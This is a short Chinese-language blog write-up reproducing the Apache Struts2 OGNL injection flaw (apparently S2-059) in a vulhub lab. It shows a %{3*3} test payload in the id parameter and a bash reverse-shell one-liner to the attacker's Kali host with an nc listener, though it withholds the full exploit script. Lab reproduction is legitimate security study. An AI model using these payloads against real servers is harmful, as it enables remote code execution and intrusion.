0x00 漏洞简介
Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。
0x01 影响版本
Struts 2.0.0 - Struts 2.5.20
0x02 环境搭建
用vulhub搭建即可
docker-compos up -d
环境完成
0x03 漏洞复现
http://your-ip:8080/?id=1
正常访问
http://your-ip:8080/?id=%{3*3}
然后F12 可以看到html里三乘以三被执行,也就是3*3被解析到id属性中了。
接下来反弹shell:
bash -i >& /dev/tcp/kali的ip/端口 0>&1
需要编码
将编码完的bash替换到脚本里边,ip替换,需要脚本的右边公众号留言
脚本运行前先用nc 监听端口,bash编码的那个端口
0x04 修复意见
更新Struts2位最新版本
继续复现s2-061
小白一枚,大佬勿喷!谢谢合作。
在漏洞复现的和挖洞中徘徊。